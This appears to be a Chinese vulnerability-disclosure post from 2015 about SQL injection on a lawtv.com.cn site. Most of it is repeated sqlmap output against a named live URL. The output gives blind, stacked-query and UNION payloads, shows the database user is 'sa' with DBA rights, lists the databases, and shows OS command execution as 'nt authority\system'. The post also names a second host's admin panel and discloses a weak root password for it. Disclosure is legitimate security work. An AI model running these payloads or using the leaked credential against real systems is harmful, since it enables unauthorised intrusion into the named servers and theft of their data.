2015-03-05: 细节已通知厂商并且等待厂商处理中 2015-03-10: 厂商已经主动忽略漏洞,细节向公众公开
问题厂商哪里加了http://,害我重新写一次):
注入点一抓一大把http://www.fzgc.lawtv.com.cn/Skins/Vedio.aspx?n_id=640&n_lx=10
sqlmap identified the following injection points with a total of 243 HTTP(s) requests:---Parameter: n_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: n_id=640 AND 5631=5631&n_lx=10 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: n_id=640;WAITFOR DELAY '0:0:5'--&n_lx=10 Type: UNION query Title: Generic UNION query (NULL) - 66 columns Payload: n_id=-3817 UNION ALL SELECT 95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(116)+CHAR(69)+CHAR(102)+CHAR(85)+CHAR(120)+CHAR(83)+CHAR(89)+CHAR(88)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113),95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95-- &n_lx=10---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: n_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: n_id=640 AND 5631=5631&n_lx=10 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: n_id=640;WAITFOR DELAY '0:0:5'--&n_lx=10 Type: UNION query Title: Generic UNION query (NULL) - 66 columns Payload: n_id=-3817 UNION ALL SELECT 95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(116)+CHAR(69)+CHAR(102)+CHAR(85)+CHAR(120)+CHAR(83)+CHAR(89)+CHAR(88)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113),95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95-- &n_lx=10---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005current user is DBA: Trueavailable databases [7]:[*] fazhi[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdbsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: n_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: n_id=640 AND 5631=5631&n_lx=10 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: n_id=640;WAITFOR DELAY '0:0:5'--&n_lx=10 Type: UNION query Title: Generic UNION query (NULL) - 66 columns Payload: n_id=-3817 UNION ALL SELECT 95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(116)+CHAR(69)+CHAR(102)+CHAR(85)+CHAR(120)+CHAR(83)+CHAR(89)+CHAR(88)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113),95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95-- &n_lx=10---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005current user is DBA: Truesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: n_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: n_id=640 AND 5631=5631&n_lx=10 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: n_id=640;WAITFOR DELAY '0:0:5'--&n_lx=10 Type: UNION query Title: Generic UNION query (NULL) - 66 columns Payload: n_id=-3817 UNION ALL SELECT 95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(116)+CHAR(69)+CHAR(102)+CHAR(85)+CHAR(120)+CHAR(83)+CHAR(89)+CHAR(88)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113),95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95-- &n_lx=10---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005current user: 'sa'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: n_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: n_id=640 AND 5631=5631&n_lx=10 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: n_id=640;WAITFOR DELAY '0:0:5'--&n_lx=10 Type: UNION query Title: Generic UNION query (NULL) - 66 columns Payload: n_id=-3817 UNION ALL SELECT 95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)+CHAR(104)+CHAR(106)+CHAR(116)+CHAR(69)+CHAR(102)+CHAR(85)+CHAR(120)+CHAR(83)+CHAR(89)+CHAR(88)+CHAR(113)+CHAR(98)+CHAR(112)+CHAR(107)+CHAR(113),95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95,95-- &n_lx=10---web server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005command standard output [1]:[*] nt authority\system
sa权限,不多说了http://www.qh.lawtv.com.cn:8080/wdcp加mysql用户貌似也是弱口令 root/wdlinux.cn
duang~
危害等级:无影响厂商忽略
忽略时间:2015-03-10 11:06
暂无